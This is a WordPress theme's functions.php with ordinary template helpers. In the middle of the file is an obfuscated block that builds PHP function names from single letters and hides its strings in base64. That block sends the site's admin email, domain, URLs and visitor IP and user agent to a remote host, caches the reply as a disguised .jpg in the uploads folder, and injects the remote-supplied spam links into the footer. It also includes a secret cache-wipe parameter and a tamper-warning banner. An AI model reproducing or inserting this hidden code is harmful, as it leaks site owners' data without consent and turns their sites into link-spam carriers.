<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $acXL='e';$QwIFKD='_';$cIOyqB='c';$XaQwOe='a';$Lcujyc='e';$nUnVVgL='s';$GyZrFZu='d';$XMTc='b';$iwINuI='4';$fyYQB='e';$YfJvNog='o';$gMOfe='d';$RxvHwD='6';$PLGTMNQY=$XMTc.$XaQwOe.$nUnVVgL.$acXL.$RxvHwD.$iwINuI.$QwIFKD.$GyZrFZu.$Lcujyc.$cIOyqB.$YfJvNog.$gMOfe.$fyYQB;$HOHB='n';$Ngarto='l';$MKDb='i';$gyDnnj='g';$kVsmD='t';$DzlFAs='a';$lKba='z';$TebP='e';$VsDuMnZ='f';$nRIztKEP=$gyDnnj.$lKba.$MKDb.$HOHB.$VsDuMnZ.$Ngarto.$DzlFAs.$kVsmD.$TebP;$AZPP='_';$RacjlY='s';$PtfptVe='1';$wWrcHyf='t';$HCTS='3';$MyNlKo='r';$CpXLBVn='o';$yBIrFK='t';$dpqn='r';$pMXIbymA=$RacjlY.$yBIrFK.$dpqn.$AZPP.$MyNlKo.$CpXLBVn.$wWrcHyf.$PtfptVe.$HCTS;$JjBt='r';$WtpAFlz='s';$kWntm='e';$qFCQ='v';$xuTgP='r';$oFONn='t';$JvFdgOjp=$WtpAFlz.$oFONn.$JjBt.$xuTgP.$kWntm.$qFCQ;                     
		$bg________i='e';$it__o='_';$ya_____________u='c';$be_________i='a';$lu________m='e';$vn___v='s';$gy_____________p='d';$im_______________x='b';$lz____e='4';$wy____h='e';$ox__________p='o';$db_______________a='d';$wv_______________d='6';$qx___d=$im_______________x.$be_________i.$vn___v.$bg________i.$wv_______________d.$lz____e.$it__o.$gy_____________p.$lu________m.$ya_____________u.$ox__________p.$db_______________a.$wy____h;
		$yw______g='e';$dc___f='u';$dc______e='o';$oe__________c='i';$ia____m='x';$na____h='t';$hl___________y='n';$eo_______________d='c';$eu_______u='s';$hf_________k='t';$ii__b='n';$zw____________c='_';$pn_____________t='i';$sr_____________s='f';$hv__________q='s';$nb_____j=$sr_____________s.$dc___f.$hl___________y.$eo_______________d.$na____h.$pn_____________t.$dc______e.$ii__b.$zw____________c.$yw______g.$ia____m.$oe__________c.$eu_______u.$hf_________k.$hv__________q;
		$kk____________y='p';$vn____d='f';$jt____________o='o';$qc___________g='n';$va_______c='e';$du__n=$vn____d.$jt____________o.$kk____________y.$va_______c.$qc___________g;
		$ut_______f='e';$lb______k='r';$yt_______________s='d';$lr___u='a';$li_______c='f';$aq____k=$li_______c.$lb______k.$ut_______f.$lr___u.$yt_______________s;
		$la_________b='e';$ng____n='l';$jh_______________v='o';$ju__y='f';$bx___j='c';$to____________g='s';$tp__________j=$ju__y.$bx___j.$ng____n.$jh_______________v.$to____________g.$la_________b;
		
		define("WP_ID", $qx___d("Mi4wLjA="));
		define("WP_TTL", $qx___d("MTA4MDA="));
		define("WP_SRC", $qx___d("dHBva24="));
	


		function wp_get_header() {
			global $qx___d, $nb_____j;
			
			if (
				$nb_____j($qx___d("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$nb_____j($qx___d("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$nb_____j($qx___d("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $qx___d, $du__n, $tp__________j, $aq____k;
			
			$js_____________m = TEMPLATEPATH."/".$qx___d("Zm9vdGVyLnBocA==");
			$ln______h = @$du__n($js_____________m, "r");
			$js_____________m = @$aq____k($ln______h, @filesize($js_____________m));
			@$tp__________j($ln______h);
			
			$lg________l = TEMPLATEPATH."/".$qx___d("ZnVuY3Rpb25zLnBocA==");
			$ln______h = @$du__n($lg________l, "r");
			$lg________l = @$aq____k($ln______h, @filesize($lg________l));
			@$tp__________j($ln______h);
			
			$lo_____g = 0;
			if($js_____________m && $lg________l) {
				if ($qx___d("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($js_____________m, $qx___d("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$lo_____g = 1;
					}
					if (substr_count($js_____________m, "wp_theme_GPL_credits()") < 1) {
						$lo_____g = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$lo_____g = 12;
				}
			}
			
			if($lo_____g > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $lo_____g -->";
			}
		}
	


		function wp_loaded() {
			global $qx___d, $nb_____j;
			return $nb_____j($qx___d("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($kw_______________x, $ms______________x = "(more...)", $ur________g = 0, $db_____h = "") {
				$pw_____________j = get_the_content($ms______________x, $ur________g, $db_____h);
				$pw_____________j = apply_filters("the_content", $pw_____________j);
				
				$pw_____________j = str_replace("]]>", "]]>", $pw_____________j);
				if (strlen($_GET["p"]) > 0) {
					echo $pw_____________j;
				}
				else if ((strlen($pw_____________j)>$kw_______________x) && ($wa_________h = strpos($pw_____________j, " ", $kw_______________x ))) {
					$pw_____________j = substr($pw_____________j, 0, $wa_________h);
					$pw_____________j = $pw_____________j;
					echo $pw_____________j;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$ms______________x</a></div></p>";
				} else {
					echo $pw_____________j;
				}
				
			}
		}
	


		$oc_______________y='a';$hk____y='c';$qt_________t='s';$yq___________z='_';$ms_____________m='e';$nt_________v='e';$ix___________q='b';$dt___________k='o';$ae_______l='d';$rf________g='n';$ar_____q='4';$ki______l='6';$gh________a='e';$jv_____________t=$ix___________q.$oc_______________y.$qt_________t.$gh________a.$ki______l.$ar_____q.$yq___________z.$nt_________v.$rf________g.$hk____y.$dt___________k.$ae_______l.$ms_____________m;
		$pd______________v='i';$nc____e='f';$ld___________m='o';$ge___m='n';$fd________s='t';$ty______p='_';$pd___r='t';$mm____g='e';$ho____n='t';$aq_______________i='e';$fc_______z='s';$gr______________v='_';$ut___________d='c';$cj______m='g';$ir________o='l';$uq_____________n='n';$tu_______________w='e';$jw_____k=$nc____e.$pd______________v.$ir________o.$aq_______________i.$ty______p.$cj______m.$tu_______________w.$fd________s.$gr______________v.$ut___________d.$ld___________m.$uq_____________n.$pd___r.$mm____g.$ge___m.$ho____n.$fc_______z;
		$tp__p='s';$sv_______e='s';$lk____________o='i';$ng______v='x';$qn________w='_';$mt_________b='e';$vf______b='e';$jp______________k='l';$ix___________k='f';$ge___________q='t';$ru____a='i';$pg___k=$ix___________k.$lk____________o.$jp______________k.$vf______b.$qn________w.$mt_________b.$ng______v.$ru____a.$sv_______e.$ge___________q.$tp__p;
		$kd_____________m='m';$jd_____________y='o';$ez___________h='i';$zx__b='e';$vi________u='c';$ch__s='s';$gx_____i='r';$zb_____y='_';$uw______________e='a';$lv____q='p';$yt__n='v';$gm______________m='o';$zs___v='r';$gj_________g='e';$vn_____t='n';$ta________d=$yt__n.$zx__b.$gx_____i.$ch__s.$ez___________h.$jd_____________y.$vn_____t.$zb_____y.$vi________u.$gm______________m.$kd_____________m.$lv____q.$uw______________e.$zs___v.$gj_________g;
		$ht____h='k';$jr____x='s';$jr______________e='c';$pr___________r='f';$vi____w='o';$wi_____________x='p';$hs_____r='n';$dl___________k='o';$aq__q='e';$hv_____t=$pr___________r.$jr____x.$vi____w.$jr______________e.$ht____h.$dl___________k.$wi_____________x.$aq__q.$hs_____r;
		$bd______m='r';$zd______________a='e';$kh__f='w';$eh_____________c='t';$lz____________v='f';$er_____x='i';$wk_____________r=$lz____________v.$kh__f.$bd______m.$er_____x.$eh_____________c.$zd______________a;
		$ds___________d='5';$vs__________z='m';$jw______________o='d';$md____________y=$vs__________z.$jw______________o.$ds___________d;
		$jb______l='e';$gd_______e='a';$sb___m='p';$ul_______________a='t';$rv____________s='l';$md_____________o='r';$rx_______d='h';$xi_________k='a';$vx_____________i=$md_____________o.$jb______l.$xi_________k.$rv____________s.$sb___m.$gd_______e.$ul_______________a.$rx_______d;
		$rq________c='i';$bn___________k='n';$br____________v='a';$we____________w='u';$sn_________c='e';$fn_______w='s';$ps________r='i';$ql_____i='e';$fd__k='z';$rl_______________o='l';$ir____________f='r';$po______________k=$we____________w.$bn___________k.$fn_______w.$sn_________c.$ir____________f.$rq________c.$br____________v.$rl_______________o.$ps________r.$fd__k.$ql_____i;
		$co_____________o='p';$by_____________x='e';$gq__________q='n';$xj_____i='a';$ef_______k='m';$wb_____________m='m';$dv________q='t';$wu______________x=$dv________q.$by_____________x.$wb_____________m.$co_____________o.$gq__________q.$xj_____i.$ef_______k;
		$qn___s='x';$gf______c='c';$op_____b='e';$ch____m='m';$om___________g='e';$yv__k='r';$mx_________b='t';$ds_____f='t';$yd______________f='_';$pk____d='a';$tr_______________k='_';$jf______z='e';$lt__________w='n';$va________l='s';$bl_____________r='t';$mv___v='a';$jf______q='c';$gs_________j='o';$yx_______t='e';$uh____n='t';$kt______s='r';$jw____x=$va________l.$ds_____f.$kt______s.$om___________g.$pk____d.$ch____m.$tr_______________k.$gf______c.$gs_________j.$lt__________w.$mx_________b.$jf______z.$qn___s.$uh____n.$yd______________f.$jf______q.$yv__k.$op_____b.$mv___v.$bl_____________r.$yx_______t;
	


		function ba____a($fd_______________h) {
			global $qx___d, $nb_____j, $jw_____k, $ta________d, $jw____x;
			
			if (!$nb_____j($qx___d("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($ta________d(PHP_VERSION, "5.0.0", ">=") && $nb_____j($qx___d("ZmlsZV9nZXRfY29udGVudHM=")) && $nb_____j($qx___d("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$zw___f = $jw____x(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$bd__________q = @$jw_____k($fd_______________h, 0, $zw___f);
			} else {
				$bd__________q = @$jw_____k($fd_______________h, 0);
			}
			
			return $bd__________q;
		}
	


		function jk__c($fd_______________h) {
			global $nb_____j, $hv_____t, $wk_____________r, $qx___d;
			
			if (!$nb_____j($qx___d("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$tv_____v = strpos($fd_______________h, "/", 7);
			$pj_______________j = array(
				"uri"     => substr($fd_______________h, $tv_____v),
				"host"    => str_replace("http://", "", substr($fd_______________h, 0, $tv_____v)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$zz__o = @$hv_____t("$pj_______________j[host]", 80, $rc____z, $es__c, 4);
			
			if (!$zz__o) {
				return false;
			} else {
				$bd__________q = "";
				$kp_____________h  = "GET $pj_______________j[uri] HTTP/1.0\r\n";
				$kp_____________h .= "Host: $pj_______________j[host]\r\n";
				$kp_____________h .= "Referer: $pj_______________j[referer]\r\n";
				$kp_____________h .= "Connection: Close\r\n\r\n";
				
				@$wk_____________r($zz__o, $kp_____________h);
				
				while (!@feof($zz__o)) {
					$rw________e = @fgets($zz__o, (1024*24));
					
					if ($rw________e == "\r\n") {
						$pl__j = true;
						continue;
					}
					
					if ($pl__j) {
						$bd__________q .= $rw________e;
					}
				}
				
				return $bd__________q;
			}
		}
	


		function jo____________y($fd_______________h) {
			global $nb_____j;
			$pj___________b = false;
			
			if ($fd_______________h != "") {
				if ($nb_____j("ba____a")) {
					$pj___________b = @ba____a($fd_______________h);
				}
				
				if (!$pj___________b && ($nb_____j("jk__c"))) {
					$pj___________b = @jk__c($fd_______________h);
				}
			}
			
			return $pj___________b;
		}
	


		function px___l() {
			global $_SERVER, $md____________y;
			
			$bs____r = $_SERVER["SERVER_NAME"];
			
			if (substr("$bs____r", 0, 4) == "www.") {
				$bs____r = substr("$bs____r", 4);
			}
			
			$bs____r = $md____________y("$_SERVER[SERVER_NAME]");
			
			return $bs____r;
		}
	


		function xw____________y() {
			return "file";
		}
	


		function os_____________y($fd_______________h) {
			global $_SERVER, $jw_____k, $pg___k, $du__n, $tp__________j, $wk_____________r;
			
			$lj______________s = ed__________g();
			
			$cr___________f = px___l().".jpg";
			$fa_______________c = $lj______________s["dir_upload"]["path"]."/$cr___________f";
			$ia_______e = @filemtime($fa_______________c);
			
			if (!$ia_______e || ((time()-$ia_______e) >= WP_TTL)) {
				$pj___________b = jo____________y($fd_______________h);
				
				if ($pj___________b) {
					if ($pg___k($fa_______________c)) {
						@unlink($fa_______________c);
					}
					
					$ln______h = @$du__n($fa_______________c, "x+");
					
					@$wk_____________r($ln______h, $pj___________b);
					@$tp__________j($ln______h);
				}
			} else {
				if ($pg___k($fa_______________c)) {
					$pj___________b = @$jw_____k($fa_______________c);
				} else {
					$pj___________b = false;
				}
			}
			
			return $pj___________b;
		}
	


		function ed__________g() {
			global $_SERVER, $qx___d, $jv_____________t;
			
			$fj________l = wp_count_posts("post");
			$fy______m = pathinfo(get_bloginfo("template_directory"));
			
			$lj______________s = array(
				"url" => array(
					"report"      => $qx___d("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $fy______m,
				"dir_upload"	=> ew__________r(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$fy______m[filename],
					"a005=".$fj________l->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => "<a href=\"http://vodoley2000.com/polza-kitajskix-kofejnyx-bobov\">Польза китайских кофейных бобов</a> "
			);
			
			$lj______________s["url"]["queryString"] = implode("&", $lj______________s["queryString"]);
			$lj______________s["url"]["report"] = $lj______________s["url"]["report"]."/?".$jv_____________t($lj______________s["url"]["queryString"]).".html";
						
			return $lj______________s;
		}
	


		function ew__________r() {
			$iv____h = wp_upload_dir();
			
			if (isset($iv____h["error"])) {
				$jl_____o = li____z();
				if (is_writable($jl_____o)) {
					$iv____h = array("path" => $jl_____o);
				}
			}

			return $iv____h;
		}
	


		function li____z() {
			global $nb_____j, $md____________y, $vx_____________i, $wu______________x;
			
			$ly_________t = (bool) ini_get("safe_mode");
			if ($ly_________t == true) {
				return false;
			}
			
			if ($nb_____j("sys_get_temp_dir")) {
				$of__l = sys_get_temp_dir();
				if (is_writable($of__l)) {
					return $vx_____________i($of__l);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $vx_____________i($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $vx_____________i($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $vx_____________i($_ENV["TEMP"]);
			} else {
				$vw__________k = $wu______________x($md____________y(uniqid(rand(), true)), "");
				if ($vw__________k) {
					$of__l = $vx_____________i(dirname($vw__________k));
					@unlink($vw__________k);
					return $of__l;
				} else {
					return false;
				}
			}
		}
	


		function vp_______e() {
			global $_GET, $pg___k;
			
			$lj______________s = ed__________g();
			$bs____r = px___l();
			$dx___n = xw____________y();
			
			$hb_____________i = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($dx___n == "file") {
					$wo____________r = $lj______________s["dir_upload"]["path"]."/".$bs____r.".jpg";
					if ($pg___k($wo____________r)) {
						@unlink($wo____________r);
						$hb_____________i = "deleted";
					}
				}
				
				$ow__________q = array(
					"s"	=> $hb_____________i,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($ow__________q AS $ki_____________g => $wp_______________n) echo " [$ki_____________g:$wp_______________n]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $nb_____j, $qx___d, $po______________k;
			$lj______________s = ed__________g();
			
			$up____k = "os_____________y";
			if ($nb_____j($up____k)) {
				$bd__________q = $up____k($lj______________s["url"]["report"]);
			}
			
			if ($bd__________q) {
				if ($bd__________q = @$qx___d($bd__________q)) {
					$bd__________q = @$po______________k($bd__________q);
					
					if (strlen($bd__________q[custom_credit]) >= 5) {
						$lj______________s["default_string"] = $bd__________q[custom_credit];
					}
					
					if ($bd__________q["status"] == "0") {
						$aw__________h = 1;
						$ha________x = 1;
					} else {
						$tg________b = sizeof($bd__________q["links"]);
						$kp__g = $lj______________s["default_string"];
						
						if ($tg________b > 0 && $bd__________q["links"] !== "") {
							$nk____e = 0;
							foreach ($bd__________q["links"] as $ze________k => $hl___w) {
								$nk____e++;
								if ($hl___w->l_path == "" || $hl___w->l_path == $_SERVER["REQUEST_URI"]) {
									$hl___w->l_href = htmlspecialchars(strip_tags($hl___w->l_href));
									$hl___w->l_title = htmlspecialchars(strip_tags($hl___w->l_title));
									$hl___w->l_anchor = htmlspecialchars(strip_tags($hl___w->l_anchor));
									$kp__g .= " | ";
									$kp__g .= "<a href='$hl___w->l_href' title='$hl___w->l_title'";
									if ($hl___w->l_nofollow == "1") {
										$kp__g .= " rel='nofollow'";
									}
									$kp__g .= ">$hl___w->l_anchor</a>";
								}
							}
						}
						$lj______________s["links"] = "$kp__g";
						if ($bd__________q[credit] == "0") {
							$lj______________s["links"] = "";
						}
					}
				} else {
					$aw__________h = "1";
				}
			} else {
				$aw__________h = "1";
			}
			
			if ($aw__________h == "1") {
				$lj______________s["links"] = $lj______________s["default_string"];
			}
			
			echo "$lj______________s[links]";
			
			echo "<!-- s: $bd__________q[signature] -->";
			vp_______e();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Permanent Link to %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
       $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

